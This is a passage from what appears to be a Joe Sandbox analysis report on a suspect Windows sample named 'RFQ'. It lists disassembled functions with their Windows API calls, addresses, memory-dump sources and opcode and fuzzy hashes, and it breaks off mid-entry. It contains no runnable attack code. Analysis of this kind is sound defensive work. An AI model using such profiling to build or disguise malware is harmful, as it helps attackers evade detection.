                                                                          • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                          • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                          • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                          • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                          Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                          • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                          • SendMessageW.USER32 ref: 00471740
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                          • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                          • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                          • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                          • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                          • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                          • SendMessageW.USER32 ref: 0047184F
                                                                          • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                          • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                          • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                          • String ID:
                                                                          • API String ID: 4116747274-0
                                                                          • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                          • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                          • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                          • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                          Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                          • _wcslen.LIBCMT ref: 00461683
                                                                          • __swprintf.LIBCMT ref: 00461721
                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                          • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                          • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                          • GetParent.USER32(?), ref: 004618C3
                                                                          • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                          • String ID: %s%u
                                                                          • API String ID: 1899580136-679674701
                                                                          • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                          • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                          • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                          • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                          Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                          • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                          • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: InfoItemMenu$Sleep
                                                                          • String ID: 0
                                                                          • API String ID: 1196289194-4108050209
                                                                          • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                          • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                          • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                          • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                          Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 0043143E
                                                                          • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                          • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                          • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                          • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                          • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                          • String ID: (
                                                                          • API String ID: 3300687185-3887548279
                                                                          • Opcode ID: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                                          • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                          • Opcode Fuzzy Hash: 7cf8b5f06cf9837a80c5bf18f75efab984d242103ae75fea6cfb4fef03d4f8e7
                                                                          • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                          Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                            • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                          • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_wcslen$BuffCharDriveLowerType_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 1976180769-4113822522
                                                                          • Opcode ID: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                          • Instruction ID: 81dc6b2e9a5b1b7ac5bd11c7175921e379baf9e0c2b27e14ed053c07c028f3b1
                                                                          • Opcode Fuzzy Hash: a85f7e6fea3b256bd08f49877ae03d0a36a67fa55ca674d77d79428d7feae10a
                                                                          • Instruction Fuzzy Hash: 75516E715043049FD710EF21C981B5EB3E4BF88304F14896FF995AB292D7B8E909CB5A
                                                                          Function 00432A10 Relevance: 21.1, APIs: 14, Instructions: 140timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcslen$_wcsncpy$LocalTime__fassign
                                                                          • String ID:
                                                                          • API String ID: 461458858-0
                                                                          • Opcode ID: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                          • Instruction ID: 9848deb76f2cd1bd94a84263f46e444e1138d8b87e7a9916e51222e649cc75ea
                                                                          • Opcode Fuzzy Hash: 26761b0a7209b856481a9ddbc8736091f87f92f0ac2320453e44697a96ade7e6
                                                                          • Instruction Fuzzy Hash: B1417372D10204B6CF10EFA5C946ADFF3B8DF49314F90885BE909E3121F6B4E65583A9
                                                                          Function 0043009D Relevance: 21.1, APIs: 14, Instructions: 134filecommemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000), ref: 004300C3
                                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 004300DE
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000), ref: 004300E9
                                                                          • GlobalLock.KERNEL32(00000000), ref: 004300F6
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00430105
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0043010C
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00430113
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00430120
                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,004829F8,?), ref: 0043013E
                                                                          • GlobalFree.KERNEL32(00000000), ref: 00430150
                                                                          • GetObjectW.GDI32(?,00000018,?), ref: 00430177
                                                                          • CopyImage.USER32(?,00000000,?,?,00002000), ref: 004301A8
                                                                          • DeleteObject.GDI32(?), ref: 004301D0
                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004301E7
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3969911579-0
                                                                          • Opcode ID: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                          • Instruction ID: 40287395d2d29e4935595b2baf4d6657c54b4003bec4d35786bf86d2452689d1
                                                                          • Opcode Fuzzy Hash: fd1addb57dfcb9cf3c81a7192785a12cb72203be8d3c1966912b6329e8233f20
                                                                          • Instruction Fuzzy Hash: 41414C75600208AFDB10DF64DD88FAE77B8EF48711F108659FA05AB290D7B5AD01CB68
                                                                          Function 004551F5 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 115windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow
                                                                          • String ID: 0
                                                                          • API String ID: 956284711-4108050209
                                                                          • Opcode ID: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                          • Instruction ID: b5af5d15e8ca477bb279da78e69062a53aed449fe0dbaae2e4c2ef00f9b57ed5
                                                                          • Opcode Fuzzy Hash: d13a276e73d68c5a88ff05331af00a4635b68400f986b822500444c43e982ccd
                                                                          • Instruction Fuzzy Hash: 91412770200601AFD714DF64D9A8B6B77A8BF48302F10896DFD45CB292D778E848CFA9
                                                                          Function 00433493 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 84networkCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$Cleanup$Startup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 1965227024-3771769585
                                                                          • Opcode ID: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                          • Instruction ID: 28916de6e65f37ac85efecafd260a3a31c9a3caf28ae6c56f7260ddb0d4b80cb
                                                                          • Opcode Fuzzy Hash: 076f4e753302d8e1360c69636e2804f45f3b9e513b8bc5fd0a6f442411ef1df6
                                                                          • Instruction Fuzzy Hash: 4F213A32A00114BBC710AF65DC05EEF736CEF99716F0045AFF90993151EEB99A8187E8
                                                                          Function 0045F56D Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 78COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045F5D5
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F5EC
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045F5FE
                                                                          • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045F611
                                                                          • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045F61E
                                                                          • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045F634
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$_memmove_wcslen
                                                                          • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                          • API String ID: 369157077-1007645807
                                                                          • Opcode ID: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                          • Instruction ID: e81aaa69409cfefceaf3864659f825962b2ddf67c6d06b6a861a29a56a66176d
                                                                          • Opcode Fuzzy Hash: f963851227cb2bcafec7df3ef8778280fda42e08bc5c03876a4728c3ed9f2a05
                                                                          • Instruction Fuzzy Hash: 7F21A83168021D66E720FB95DC46FFE7368AF40700F20087BFA14B71D1DAB4A949879D
                                                                          Function 00445BE4 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 77windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetParent.USER32 ref: 00445BF8
                                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 00445C0D
                                                                          • __wcsicoll.LIBCMT ref: 00445C33
                                                                          • __wcsicoll.LIBCMT ref: 00445C4F
                                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445CA9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                          • API String ID: 3125838495-3381328864
                                                                          • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                          • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                          • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                          • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                          Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                          • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                          • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                          • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                          • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                          • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$CharNext
                                                                          • String ID:
                                                                          • API String ID: 1350042424-0
                                                                          • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                          • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                          • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                          • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                          Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                          Download Yara Rule
                                                                          APIs
